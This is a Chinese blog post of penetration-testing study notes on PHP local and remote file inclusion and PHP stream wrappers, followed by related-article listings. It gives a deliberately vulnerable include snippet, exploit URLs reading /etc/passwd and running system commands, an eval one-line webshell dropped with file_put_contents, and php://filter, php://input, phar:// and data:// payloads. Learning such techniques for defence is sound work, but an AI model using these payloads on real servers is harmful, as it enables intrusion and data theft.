文件包含 -- Web渗透

最新推荐文章于 2024-09-13 10:46:15 发布
最新推荐文章于 2024-09-13 10:46:15 发布
阅读量221 收藏
点赞数
分类专栏: 安全 文章标签: 前端 php 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bossDDYY/article/details/127040058
版权

本地文件包含

源代码

$filename=$_GET['filename'];
include $filename; // require include_once require_once
echo "欢迎来到php世界";

利用条件

  • php.ini 的 allow_url_fopen=On (默认开启)
  • 用户参数可控且后台代码没有对包含的文件进行过滤

利用方式

http://192.168.159.128/php/file.php?filename=ss.php&name=duyun
http://192.168.159.128/php/file.php?filename=/etc/passwd
http://192.168.159.128/php/file.php?filename=login.phtml

require、include包含文件都按照以PHP的后缀进行处理,按照PHP代码进行执行比如test.txt里面有小马,会进行执行代码

远程文件包含

利用条件

  • php.ini 的 allow_url_fopen=On (默认开启) 和 allow_url_include=On (默认关闭)
  • 用户参数可控且后台代码没有对包含的文件进行过滤

利用方法

//ss.php: echo @eval($_GET['code']);

http://192.168.159.128/php/file.php?filename=https://www.baidu.com/
http://192.168.159.128/php/file.php?filename=ss.php&code=system("ip addr");

上传木马

file_put_contents("/opt/temp/muma.php",'<?php @eval($_GET[["code"]]);?>');

http://192.168.159.128/php/file.php?filename=f.php

PHP伪协议

伪协议介绍

file://  - 访问本地文件系统
http://  -访问http(s)网页
ftp://   -访问ftp(s)URLS
php://   -访问各个输入输出流
zlib://  -压缩流
data://  -数据
glob://  -查找匹配的文件路径模式
phar://  -PHP 归档
ssh2://  -secure shell 2
rar://   -RAR
ogg://   -音频流
expect://-处理交互式的流

php://是一种伪协议,主要是开启了一个输入输出流,理解为文件数据传输的一个通道

常见的伪协议:php://input、php://filter、phar://

php://filter – 读取源码

打开数据流,把里面的内容以base64编码或者其他编码的方式读取出来

使用 convert.iconv.[]过滤器,[]中支持以下字符编码(* 表示该编码也可以在正则表达式中使用)

UCS-4*
UCS-4BE
UCS-4LE*
UCS-2
UCS-2BE
UCS-2LE
UTF-32*
UTF-32BE*
UTF-32LE*
UTF-16*
UTF-16BE*
UTF-16LE*
UTF-7
UTF7-IMAP
UTF-8*
ASCII*
EUC-JP*
SJIS*
eucJP-win*
SJIS-win*
...
\\具体支持的编码可见php官方文档
\\https://www.php.net/manual/zh/mbstring.supported-encodings.php

php://filter/read/convert.base64-encode/resource=flag.php
php://filter/convert.iconv.UTF-7.UCS-4*/resource=flag.php

php://input – POST输入

需要打开allow_url_include=On 相当于一个文件包含的利用

php://打开文件流后,直接在流里面写入我们的恶意代码,此时执行恶意代码(POST请求)

<?php system('ip addr')?>

phar:// – 压缩文件

主要用于在php中对压缩文件格式的读取。通常配合文件上传漏洞使用

使用:把一句话木马压缩成zip格式,然后再上传到服务器

http://xxxxxx/xx/file=phar://shell.zip/shell.txt

要给目标服务器写入一个文件,直接上传至服务器或者进入命令行去攻击服务器上下载

zip://

也是对压缩文件的读取,和phar有区别

  • zip只能读取单级目录,phar支持多级
http://xxxxxx/xx/file=phar://shell.zip%23shell.txt

data://

本身是数据流封装器,其原理和用法和php://input相似,但是发送GET请求

data://text/plain,<?php phpinfo();?>
data://text/plain;base64,  (后面的?>要省去不写)
yb0os1
关注
专栏目录
web渗透--14--目录遍历/文件包含测试
武天旭的博客
09-12 2621
1、漏洞描述 文件包含是指程序代码在处理包含文件的时候没有严格控制。导致用户可以构造参数包含远程代码在服务器上执行,并得到网站配置或者敏感文件,进而获取到服务器权限,造成网站被恶意删除,用户和交易数据被篡改等一系列恶性后果。主要包括本地文件包含和远程文件包含两种形式,由于开发人员编写源码,开放着将可重复使用的代码插入到单个的文件中,并在需要的时候将它们包含在特...
web渗透-------WEB漏洞(文件上传)
hhhjjjllll的博客
05-12 1172
文件上传漏洞是指 Web 服务器允许用户将文件上传至其文件系统,但这些文件可能并没有经过充分的验证,如文件名称、类型、内容或大小等。未能正确执行这些限制就意味着即使最基本的图像上传功能也可能用于上传任意具有潜在危险的文件,里面甚至包括远程代码执行的服务器端脚本文件。在某些情况下,上传文件的行为本身就足以造成损害,其他攻击对该文件后续 HTTP 的请求,通常是为了触发服务器执行该文件。
web渗透-------WEB漏洞(前期知识)
hhhjjjllll的博客
05-08 240
前期知识一、常见漏洞及其危害1、SQL注入2、文件上传3、XSS4、文件包含5、反序列化6、RCE7、未授权访问8、CSRF9、SSRF11、目录遍历12、XXE 一、常见漏洞及其危害 1、SQL注入 数据库信息泄漏: 数据库中存储的用户隐私信息泄露。 网页篡改: 数据库中存储的用户隐私信息泄露。 网站被挂马,传播恶意软件: 数据库中存储的用户隐私信息泄露。 数据库被恶意操作: 数据库中存储的用户隐私信息泄露。 服务器被远程控制,被安装后门: 经由数据库服务器提供的操作系统支持,让黑客得以修改或控制操作
Web渗透测试---Web TOP 10 漏洞
weixin_56319791的博客
10-27 5663
Web渗透测试---Web Top 10 漏洞
【渗透测试-web安全】DVWA-文件包含
harry_c的博客
11-11 1221
【渗透测试-web安全】DVWA-文件包含基本概念基本配置等级选择进入界面文件配置重启服务漏洞利用进阶内容基本的构建思路服务端会过滤掉对应的字符信息防范 基本概念 其实之前的文章说过,文件包含是一种代码的处理方法,比如函数include、require等,参数是文件名 但是如果对应的参数能够被用户可控的话,黑客就能够利用,构造出危害系统的缺口。 基本配置 等级选择 首选选择DVWA的等级为Low ...
web渗透文件包含漏洞-学习笔记分享
weixin_52112965的博客
07-16 1142
文件包含知识的总结
WEB渗透文件包含漏洞
qq_65395016的博客
10-21 1416
文件包含漏洞
渗透测试技术----常见web漏洞--文件包含攻击原理及防御
wwl012345的博客
08-20 3700
一、文件包含漏洞介绍 1.文件包含简介 开发者将相同的函数写进单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写。这种文件调用的过程称为文件包含。 2.文件包含漏洞简介 开发人员为了使代码更加灵活,会将包含的文件设置为变量,用来进行动态调用,从而导致客户端可以调用一个恶意文件,这就会造成文件包含漏洞。 二、文件包含漏洞原理 由于开发人员编写源码时可将重复使用的代码写入到单个文件...
渗透测试-文件包含漏洞
lza20001103的博客
04-27 1643
文件包含漏洞
web渗透-------基础入门
hhhjjjllll的博客
04-25 1441
本意是指一座建筑背面开设的门,通常比较隐蔽,为进出建筑的人提供方便和隐蔽。在信息安全领域,
DC-4-Web渗透测试靶机
01-19
例如,SQL注入、跨站脚本(XSS)、文件包含漏洞、命令注入等,都是常见的Web应用漏洞。 4. **漏洞利用**:利用已知的攻击手段或编写自定义exploit,尝试对目标系统进行攻击。例如,通过SQL注入获取数据库信息,或...
各大CMS网站模板--练习web渗透必备.zip
12-11
例如,WordPress由于其广泛使用,成为黑客的主要目标,常见的漏洞可能包括SQL注入、XSS跨站脚本攻击、文件包含漏洞等。通过模拟攻击这些模板,测试人员可以学习如何识别这些漏洞,理解它们的工作原理,并学习如何...
web-渗透-文件上传漏洞专题靶场.rar
03-14
本靶场为二十一个关于文件上传漏洞的环境,从前端绕过、服务器绕过、木马图上传绕过、截断绕过、竞争条件等等几乎包含目前所有的文件上传漏洞类型,刷完即掌握文件上传漏洞的所有要点。 文件中打包了所需的所有环境...
WEB渗透学习-upload-labs靶场
04-20
6. **文件包含漏洞**:掌握如何利用文件包含漏洞执行远程或本地文件。 7. **PHP反序列化漏洞**:学习如何构造恶意的PHP对象,利用反序列化漏洞执行代码。 8. **Webshell上传**:了解如何上传Webshell并利用其进行...
Web-安全渗透全套教程文件包含漏洞渗透攻击.zip
05-22
综上所述,本套“Web安全渗透全套教程文件包含漏洞渗透攻击”课程将引导学习者了解文件包含漏洞的原理,掌握渗透测试的技巧,以及如何在实际项目中预防这类攻击。通过深入学习和实践,你可以提升自己在Web安全领域的...
构建高效 Python Web API:RESTful 设计与 GraphQL 实践
weixin_52392194的博客
09-11 1277
在现代 Web 开发中,API 是前后端通信的核心枢纽,设计一个高效且易于扩展的 API 是保证系统良好运行的基础。本文详细探讨 RESTful API 的设计准则,如何生成 API 文档,GraphQL 的应用,以及如何在 FastAPI 和 Django REST Framework 中实现分页、过滤、认证等功能。
(微服务项目)新闻头条——Day1
最新发布
weixin_73253843的博客
09-13 722
(微服务项目)新闻头条——Day1
2024伊语IM即时通讯源码/im商城系统/纯源码IM通讯系统安卓+IOS前端纯原生源码
翎风世界
09-10 646
2.4 node安装wget "https://nodejs.org/dist/v12.18.3/node-v12.18.3-linux-x64.tar.xz"资料参考地址:https://www.1234f.com/sj/GitHub/qtym/20240910/677.html。源码下载地址:https://www.123pan.com/s/LA1bVv-5l5Vv。备用下载地址:http://pan.1234f.com:5212/s/5PrS4。api.xxx.com接口。im.xxx.com通讯。
react 基础语法
小白小白从不日别的博客
09-13 1374
React 官方中文文档目前前端最流行的是三大框架:Vue、React、Angularreact是一个用于构建用户界面的 JavaScript 库react官网(Reactreact中文网(React 官方中文文档React 是一个用于构建用户界面(UI,对咱们前端来说,简单理解为:HTML 页面)的 JavaScript 库Vue 是一个渐进式的 JavaScript 框架如果从mvc的角度来看,React仅仅是视图层(V)的解决方案。也就是只负责视图的渲染,并非提供了完整了M和C的功能。
web渗透--52--异常信息泄漏
01-30
根据提供的引用内容,我无法找到关于web渗透--52--异常信息泄漏的具体信息。但是,异常信息泄漏是一种常见的安全漏洞,它可能会导致攻击者获取敏感信息,从而对系统进行进一步的攻击。为了防止异常信息泄漏,以下是一些常见的防御措施: 1. 配置合适的错误处理机制:确保在生产环境中禁用详细的错误信息显示,以防止攻击者获取敏感信息。可以通过在应用程序的配置文件中设置合适的错误处理机制来实现。 2. 日志管理:定期审查和监控应用程序的日志,以便及时发现异常信息泄漏的迹象。同时,确保日志中不包含敏感信息,如用户名、密码等。 3. 输入验证和过滤:对于用户输入的数据,进行严格的验证和过滤,以防止恶意输入触发异常信息泄漏。 4. 安全审计:定期进行安全审计,检查应用程序中是否存在异常信息泄漏的漏洞,并及时修复。 5. 安全培训:对开发人员进行安全培训,提高他们对异常信息泄漏漏洞的认识,并教授他们如何编写安全的代码。 请注意,以上只是一些常见的防御措施,具体的防御措施应根据具体的应用程序和环境进行定制。如果您需要更详细的信息,请参考相关的安全文档或咨询安全专家。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值